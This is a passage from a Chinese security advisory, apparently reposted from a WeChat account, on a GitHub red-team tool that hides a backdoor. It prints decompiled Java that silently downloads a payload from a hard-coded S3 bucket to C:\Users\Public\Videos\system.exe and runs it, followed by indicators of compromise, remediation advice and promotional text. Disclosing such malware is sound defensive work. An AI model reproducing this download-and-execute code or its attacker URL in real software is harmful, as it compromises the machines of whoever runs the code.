文章总结: 该文章揭露了GitHub上名为Godzilla-Revised的红队工具实为供应链投毒恶意软件。该工具在启动时无需用户交互,会通过硬编码的C2地址从AWSS3下载并执行恶意载荷,已确认有21台设备中招。文章提供了详细的技术分析、IOC指标及应急处置建议,包括立即排查并删除恶意文件、规范工具下载来源。 综合评分: 87 文章分类: 恶意软件,供应链安全,红队,漏洞预警,安全意识
,
newDownloadTask(
“https://test-8293.s3.amazonaws.com/xsazxsc/iinmm.txt”,
“b”
)
};</p>
<p>// 落地路径:典型的恶意软件藏匿目录
privatestaticfinalStringTARGET_DIR=”C:\Users\Public\Videos”;`</p>
<p>下载完成后直接执行:</p>
<p>`// 无条件启动下载的 EXE</p>
<p>privatestaticvoidstartSystemExe() {
PathexePath=Paths.get(“C:\Users\Public\Videos”).resolve(“system.exe”);
newProcessBuilder(exePath.toString())
.directory(exePath.getParent().toFile())
.start();
}`</p>
<p>线程名为 startup-resource-downloader,伪装成”资源下载器”。</p>
<p>当前 C2 基础设施仍在线</p>
<p>S3 上的恶意 payload 可直接访问:</p>
<p>| 远程文件 | HTTP 状态 | 文件大小 | MD5 |
| — | — | — | — |
| iinmm.png | 200 OK | 800,648 字节 | 4053c99dac5c005af43cad66f90dca55 |
| iinmm.txt | 200 OK | 458,416 字节 | f56ba12380f82d21c8eb214b812d1d1f |
| S3 Bucket:<code>test-8293.s3.amazonaws.com</code>,开启了 AES256 服务端加密 | | | |</p>
<p>222</p>
<p><strong>供应链投毒</strong></p>
<p>从文档说明、版本记录到整体外包装,该项目全程以红队免杀工具为伪装形态,精准瞄准渗透测试、红队作业、安全研究从业者,而这类群体本就是该类工具的高频下载和使用者。</p>
<p><strong>利用信任链:</strong></p>
<p>代码托管在 GitHub 平台,靠着知名工具哥斯拉做品牌加持。</p>
<p>发布页面直接提供编译好的 JAR 包,上手十分简单。</p>
<p>整个文件有 52MB,很容易让人觉得是打包了全部依赖,其实里面混入了不少 Apache Commons 等第三方库来打掩护。</p>
<p><strong>后门判断标准对照</strong></p>
<p>| 判定标准 | 检测结果 |
| — | — |
| 是否无条件执行? | 是,MainActivity 初始化直接调用 |
| 是否有用户开关? | 否,代码中无任何 if (enabled) 判断 |
| 是否有 UI 提示? | 否,守护线程静默运行 |
| 远程地址是否硬编码? | 是,S3 URL 写死在字节码中 |
| 落地文件名是否伪装? | 是,.png → system.exe |
| 是否自动执行下载文件? | 是,ProcessBuilder.start () |
| README 是否提及? | 否,只字未提 |
| 判定结论 | 七个标准全部命中 |</p>
<p>3</p>
<p><strong>影响范围</strong></p>
<p><strong>一、已确认中招案例</strong></p>
<p>经沙箱环境加载测试该 JAR 程序,已复现恶意攻击行为并确认中招风险:程序可主动下发载荷,成功将<code>C:\Users\Public\Videos\system.exe</code>恶意程序下载至本地磁盘,文件大小 <strong>451157</strong> 字节。</p>
<p>本次测试过程中,该可执行文件因程序异常问题未能正常启动运行,系统 Prefetch 日志无相关执行记录,但恶意文件落地下载行为已真实生效,主机已暴露安全风险。</p>
<p><strong>二、潜在</strong><strong>风险</strong></p>
<p>1.攻击者可随时替换存储在 S3 中的恶意载荷,同时也能覆盖 GitHub Release 发布的 JAR 包。即便终端用户未主动更新程序,设备下次启动时仍会拉取最新恶意载荷。</p>
<p>2.结合文件哈希比对结果可判断,S3 端的恶意文件正处于迭代更新阶段:从 S3 下载的文件大小分别为 800KB、458KB,而本地落地文件为 451KB,二者哈希值不一致,证实攻击者在持续修改载荷。</p>
<p>3.目前该恶意程序累计下载次数达 21 次,初步判定至少有 21 台设备已遭到入侵。</p>
<p>4</p>
<p><strong>技术指标(IOC)</strong></p>
<p>文件指标</p>
<p>| 文件 | 路径 | SHA256 |
| — | — | — |
| 投毒 JAR | godzilla_revived_v4.0.jar | 54f9f8c2…(请自行计算) |
| 落地 EXE | C:\Users\Public\Videos\system.exe | 1b61c4b358aa1c83d73b780dd92fe159d2b5700db24ac7cad2f169586c3a318d |</p>
<p>网络指标</p>
<p>| 指标 | 值 |
| — | — |
| C2 域名 | test-8293.s3.amazonaws.com |
| S3 Bucket | test-8293 |
| Payload 路径 | /xsazxsc/iinmm.png |
| Payload 路径 | /xsazxsc/iinmm.txt |</p>
<p>行为指标</p>
<ul>
<li>
<p>Java 进程启动后创建</p>
<p><code>C:\Users\Public\Videos\system.exe</code></p>
</li>
<li>
<p>守护线程名为 <code>startup-resource-downloader</code></p>
</li>
<li>
<p>网络请求到 <code>test-8293.s3.amazonaws.com</code></p>
</li>
</ul>
<p><strong>建 议</strong></p>
<p><strong>1、规范工具下载与使用</strong>:</p>
<p>严禁从非官方 GitHub 仓库、第三方分享站下载红队、渗透测试类工具,本次恶意项目借知名工具名号伪装,务必核对项目所有者、仓库历史、官方认证标识,拒绝小众复刻、二次改版类工具包。</p>
<p><strong>2、加固终端与系统防护</strong>:</p>
<p>重点监控系统目录C:\Users\Public\Videos、公共用户目录等恶意程序常用藏匿路径,设置文件读写、新增可执行文件告警,定期查杀该目录下陌生 EXE、脚本文件。</p>
<p><strong>3、加强企业/团队安全管理</strong>:</p>
<p>开展全员安全预警,面向运维、渗透测试、安全研究等相关人员通报本次投毒事件,明确该godzilla_revived_v4.0.jar为恶意程序,全员立即排查本机是否存在该文件。</p>
<p><strong>4、感染排查与应急处置</strong>:</p>
<p><strong>全面自查</strong>在所有办公主机、服务器中检索godzilla_revived_v4.0.jar、system.exe</p>
<p>检查C:\Users\Public\Videos目录是否存在异常可执行文件。</p>
<p><strong>感染处置</strong>若发现恶意文件或相关外联行为,立即断开主机网络,删除恶意Jar包、落地的system.exe及关联文件,清理后台异常线程;完成查杀后复盘溯源。</p>
<p><img decoding=)
建议点赞 + 收藏
转发给你身边的运维、网安同事!!!
-
关注我 –
-
带你了解最新安全资讯 –
微信公众号 | @POP Star安全
快手 | @【深云智安】安全实验室
小红书 | @【深云智安】安全实验室
抖音 | @【深云智安】安全实验室
bilibili | @深云智安-安全实验室
以上就是本篇文章的技术细节。
其实,每次写这类分析时,我都在想
“单篇文章就像一张漏洞快照,有价值,但也相对孤立。
真正的行业敏锐度,来自于漏洞背后的持续观察;海量告警的讨论分析;以及在真实环境中无数次历练形成的直觉。”
很难通过阅读单篇文章积累。
因此,我们构建了一个****
“注重实战交流”与“深度共享*”的*
「知识星球」社区
目前星球已聚集了[52]名安全工程师、研究员和团队负责人。
我们刻意控制规模,并设有加入门槛,只为维持聚焦、务实、互信的交流氛围。
“安全是一个对抗性极强的领域,一个人闭门造车,视角终究有限。
如果你已不满足于碎片信息,渴望在一个高质量的环境中,构建可迁移的实战知识体系,并连接一群值得信赖的同行者,这里或许适合你。
PS.:为了确保大家目标一致,请务必阅读星球置顶的《社区公约》。
这是一个为深度学习和有效连接付费的社区。
更多内容
欢迎加入「网络安全技术交流群」免费分享>>
我们专注漏洞研究、攻防实战与代码审计。
群内定期分享技术动态、实战资源与本文相关的工具资料,
让大家一起讨论、共同成长。
添加好友,备注「网络安全」获取入群邀请
更多问题1v1解答>>
点击阅读更多内容
代码审计
- 代码审计-PHP 篇(一)之从原理到实战的全景指南
- 代码审计-PHP 篇(二)之前台代码审计实战指南
- 代码审计-PHP 篇(三)之深度审计 SQL 注入漏洞
- 代码审计-PHP 篇(四)之文件操作类漏洞:深度剖析文件操作场景潜在风险
- 代码审计-PHP篇(五):洞悉风险,固守防线 — 文件读取漏洞深度解析与防护
- 代码审计-PHP篇(六)之文件删除漏洞:从任意删除到系统瘫痪的致命威胁
代码审计(实战篇)
- 『PHP代码审计』· 实战篇-熊海CMS代码审计(一)
- 『PHP代码审计』· 实战篇-熊海CMS代码审计(二)
- 『PHP代码审计』· 实战篇-熊海CMS代码审计(三)
- 『PHP代码审计』· 实战篇-BlueCMS代码审计
- 『PHP代码审计』· 实战篇-DeDeCMS代码审计
- 『PHP代码审计』· 实战篇-XdCMS代码审计
靶场搭建
- 铸器为刃——靶场搭建系列篇(一)
- 铸器为刃——靶场搭建系列篇(二)
- 铸器为刃——靶场搭建系列篇(三)
- 铸器为刃——靶场搭建系列篇(四)
- 铸器为刃——靶场搭建系列篇(五)
- 铸器为刃——靶场搭建系列篇(六)
环境搭建
- 工欲善其事必先利其器—环境搭建系列之基础工具篇一
- 工欲善其事必先利其器—『环境搭建系列之基础工具篇二
- 工欲善其事必先利其器—环境搭建系列之基础工具篇三
- 工欲善其事必先利其器—环境搭建系列之基础工具篇四
- 工欲善其事必先利其器——环境搭建系列之基础工具篇(五)
- 工欲善其事必先利其器——环境搭建系列之基础工具篇(六)
免责声明:
本文所载程序、技术方法仅面向合法合规的安全研究与教学场景,旨在提升网络安全防护能力,具有明确的技术研究属性。
任何单位或个人未经授权,将本文内容用于攻击、破坏等非法用途的,由此引发的全部法律责任、民事赔偿及连带责任,均由行为人独立承担,本站不承担任何连带责任。
本站内容均为技术交流与知识分享目的发布,若存在版权侵权或其他异议,请通过邮件联系处理,具体联系方式可点击页面上方的联系我。
本文转载自:POP Star安全 POP Star安全 POP Star安全《警惕投毒!GitHub 红队工具 Godzilla-Revived 暗藏恶意,运行就中招》
版权声明
本站仅做备份收录,仅供研究与教学参考之用。
读者将信息用于其他用途的,全部法律及连带责任由读者自行承担,本站不承担任何责任。










评论